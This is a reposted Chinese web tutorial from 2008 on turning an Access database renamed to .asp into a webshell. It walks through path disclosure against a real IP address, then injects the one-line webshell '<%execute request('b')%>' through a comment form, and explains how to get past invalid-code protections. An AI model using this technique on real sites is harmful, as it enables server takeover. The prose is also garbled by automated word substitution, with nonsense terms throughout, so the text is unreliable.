2008
04/27
18:26
你的世界地图定位我的位置:msn.com > ASP教程 > 改mdb为asp所带来的灾难

改mdb为asp所带来的灾难

发布时间:2008-04-27 18:26:00

原标题:改mdb为asp所带来的灾难

  可能性是跟脚网络安全技术的发展吧,食品安全管理员制度的高素质都在提高,在施用access+asp眉目时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等工具直接下载,其实这么样你已经是为入侵者第一季打开了大门。入侵者第一季可以利用asp/asa为后缀的数据库直接得到webshell。
一.思路

  大家伙儿都理解<%%>为asp文件的标志符,且不说一度asp文件只会去执行<% %>里头的代码,access+asp的web眉目的全部数据都是存放在数据库文件里(mdb文件),鉴于企业管理者把mdb文件改为了asp文件。倘然我们提交的数据里包含有,那当我们作客这个asp数据库的时候就会去执行<% %>里头的代码。这么样导致我们只提交恶意下载代码给数据库,那般asp后缀的数据库就是我们的webshell了。

二.示范

  随便找个目标。首先我们暴库。看是否asp后缀的数据库:
http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210


  返回:

Microsoft VBScript 孵卵器错误 错误 '800a03f6'
缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 错误 '80004005'

'D:\log_mdb\%29dlog_mdb%29.asp'鲁鱼亥豕一度有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的孵卵器。

/test/conn.asp,行18
  我们提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的乱码。这么样我们可以直接用网际早车等工具直接下载数据库(这里我们不讨论)。我们回到qq浏览器主页观望有提供“网友评论”功能。我们登记个用户,发一条评论:

< %execute request("b")%>
  这么样我们就把asp代码:<%execute request("b")%>写入了数据库,那般数据库:就是我们的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在乱码的最后我们观望:

/iisHelp/common/500-100.asp,行242
Microsoft VBScript 运行时错误 错误 '800a000d'

类型不结亲: 'execute'

/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266
  我们的倒插的代码运行了。正象图:


  注意:我们在向数据库提交代码时,代码始末不可以太大。为此我们采用<%execute request("b")%>。

三.其他一些问题和思路

  1.对此改了后缀为asp,还对数据库里加入了<%=’a’-1%>等非法的asp代码来彻底防止下载的数据库。鉴于之内存在了非法的asp代码,倒插我们的webshell代码后运行。将只会炫耀之前非法代码的错误,而不去执行我们shell的代码。固然这么样可以防止特定的攻击,但还是夫妻电视剧播放存在特定的隐患。我们只要在弄错的代码前加入兼容错误的代码,就可以得到正确炫耀执行我们倒插的webshell代码了。

  2.对此没有改后缀的,也就是mdb文件。这么样我们可以先直接下载下来得到后台明码,可以利用数据库备用改后缀为asp。
本文转摘自『IT桃李』http://www.itlearner.com/Article/2005/2342.shtml

原标题:改mdb为asp所带来的灾难

基本词:ASP

转载请保留本文网址: http://www.www.d5897.com/a/163.html
ASP
*特别声明:以上始末来自于网络编采,著作权申请流程权属性质原作者全部,请联系我们: admin#www.d5897.com (#换成@)。
Baidu